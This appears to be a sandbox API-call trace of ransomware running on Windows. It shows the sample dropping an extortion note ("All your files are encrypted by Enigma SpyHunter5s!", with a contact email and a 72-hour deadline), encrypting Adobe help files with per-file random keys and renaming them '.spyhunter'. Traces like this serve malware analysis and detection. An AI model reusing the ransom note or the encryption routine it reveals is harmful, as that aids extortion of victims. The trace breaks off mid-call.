1 [0179.767] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e354, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e354*=0x30, lpOverlapped=0x0) returned 1 [0179.767] CloseHandle (hObject=0xa0) returned 1 [0179.767] GetProcessHeap () returned 0x2c0000 [0179.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.767] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.768] GetProcessHeap () returned 0x2c0000 [0179.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.768] GetProcessHeap () returned 0x2c0000 [0179.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.768] GetProcessHeap () returned 0x2c0000 [0179.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e759f8 | out: hHeap=0x2c0000) returned 1 [0179.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.769] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.769] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2cb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x248e2cb*, lpNumberOfBytesWritten=0x248e3f4*=0x127, lpOverlapped=0x0) returned 1 [0179.769] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.770] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3f4*=0x2ac, lpOverlapped=0x0) returned 1 [0179.772] CloseHandle (hObject=0xa0) returned 1 [0179.772] GetProcessHeap () returned 0x2c0000 [0179.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75910 | out: hHeap=0x2c0000) returned 1 [0179.772] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e390 | out: pbBuffer=0x248e390) returned 1 [0179.772] GetProcessHeap () returned 0x2c0000 [0179.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.772] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e388*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e388*=0x30) returned 1 [0179.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.773] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg") returned 79 [0179.773] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.773] GetProcessHeap () returned 0x2c0000 [0179.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0179.773] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e34c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e34c*=0x15d, lpOverlapped=0x0) returned 1 [0179.774] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.774] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e34c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e34c*=0x15d, lpOverlapped=0x0) returned 1 [0179.774] GetProcessHeap () returned 0x2c0000 [0179.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0179.774] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.774] WriteFile (in: hFile=0xa0, lpBuffer=0x248e38c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e34c, lpOverlapped=0x0 | out: lpBuffer=0x248e38c*, lpNumberOfBytesWritten=0x248e34c*=0x4, lpOverlapped=0x0) returned 1 [0179.775] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e34c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e34c*=0x30, lpOverlapped=0x0) returned 1 [0179.775] CloseHandle (hObject=0xa0) returned 1 [0179.775] GetProcessHeap () returned 0x2c0000 [0179.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.775] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nl_NL\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nl_nl\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.819] GetProcessHeap () returned 0x2c0000 [0179.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.820] GetProcessHeap () returned 0x2c0000 [0179.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.820] GetProcessHeap () returned 0x2c0000 [0179.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75828 | out: hHeap=0x2c0000) returned 1 [0179.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.820] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.820] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2c3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3ec, lpOverlapped=0x0 | out: lpBuffer=0x248e2c3*, lpNumberOfBytesWritten=0x248e3ec*=0x127, lpOverlapped=0x0) returned 1 [0179.821] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.821] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3ec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3ec*=0x2ac, lpOverlapped=0x0) returned 1 [0179.821] CloseHandle (hObject=0xa0) returned 1 [0179.821] GetProcessHeap () returned 0x2c0000 [0179.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74e30 | out: hHeap=0x2c0000) returned 1 [0179.821] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e388 | out: pbBuffer=0x248e388) returned 1 [0179.821] GetProcessHeap () returned 0x2c0000 [0179.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e380*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e380*=0x30) returned 1 [0179.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.823] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg") returned 79 [0179.823] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.823] GetProcessHeap () returned 0x2c0000 [0179.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.823] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e344, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e344*=0x15d, lpOverlapped=0x0) returned 1 [0179.824] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.824] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e344, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e344*=0x15d, lpOverlapped=0x0) returned 1 [0179.824] GetProcessHeap () returned 0x2c0000 [0179.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.824] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.824] WriteFile (in: hFile=0xa0, lpBuffer=0x248e384*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e344, lpOverlapped=0x0 | out: lpBuffer=0x248e384*, lpNumberOfBytesWritten=0x248e344*=0x4, lpOverlapped=0x0) returned 1 [0179.824] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e344, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e344*=0x30, lpOverlapped=0x0) returned 1 [0179.825] CloseHandle (hObject=0xa0) returned 1 [0179.825] GetProcessHeap () returned 0x2c0000 [0179.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.825] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.826] GetProcessHeap () returned 0x2c0000 [0179.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.827] GetProcessHeap () returned 0x2c0000 [0179.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.827] GetProcessHeap () returned 0x2c0000 [0179.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74d48 | out: hHeap=0x2c0000) returned 1 [0179.827] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.827] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.827] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2bb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x248e2bb*, lpNumberOfBytesWritten=0x248e3e4*=0x127, lpOverlapped=0x0) returned 1 [0179.828] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.828] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0179.828] CloseHandle (hObject=0xa0) returned 1 [0179.828] GetProcessHeap () returned 0x2c0000 [0179.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74c60 | out: hHeap=0x2c0000) returned 1 [0179.829] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e380 | out: pbBuffer=0x248e380) returned 1 [0179.829] GetProcessHeap () returned 0x2c0000 [0179.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.829] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e378*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e378*=0x30) returned 1 [0179.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.829] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg") returned 79 [0179.829] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.829] GetProcessHeap () returned 0x2c0000 [0179.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.829] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e33c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e33c*=0x15d, lpOverlapped=0x0) returned 1 [0179.830] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.830] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e33c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e33c*=0x15d, lpOverlapped=0x0) returned 1 [0179.830] GetProcessHeap () returned 0x2c0000 [0179.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.831] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.831] WriteFile (in: hFile=0xa0, lpBuffer=0x248e37c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e33c, lpOverlapped=0x0 | out: lpBuffer=0x248e37c*, lpNumberOfBytesWritten=0x248e33c*=0x4, lpOverlapped=0x0) returned 1 [0179.831] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e33c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e33c*=0x30, lpOverlapped=0x0) returned 1 [0179.831] CloseHandle (hObject=0xa0) returned 1 [0179.831] GetProcessHeap () returned 0x2c0000 [0179.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.831] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.832] GetProcessHeap () returned 0x2c0000 [0179.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.832] GetProcessHeap () returned 0x2c0000 [0179.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.832] GetProcessHeap () returned 0x2c0000 [0179.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74b78 | out: hHeap=0x2c0000) returned 1 [0179.832] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.832] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.832] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2b3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x248e2b3*, lpNumberOfBytesWritten=0x248e3dc*=0x127, lpOverlapped=0x0) returned 1 [0179.833] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.834] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3dc*=0x2ac, lpOverlapped=0x0) returned 1 [0179.835] CloseHandle (hObject=0xa0) returned 1 [0179.835] GetProcessHeap () returned 0x2c0000 [0179.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74a90 | out: hHeap=0x2c0000) returned 1 [0179.835] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e378 | out: pbBuffer=0x248e378) returned 1 [0179.835] GetProcessHeap () returned 0x2c0000 [0179.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.835] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e370*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e370*=0x30) returned 1 [0179.835] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.836] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg") returned 79 [0179.836] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.836] GetProcessHeap () returned 0x2c0000 [0179.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.836] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, 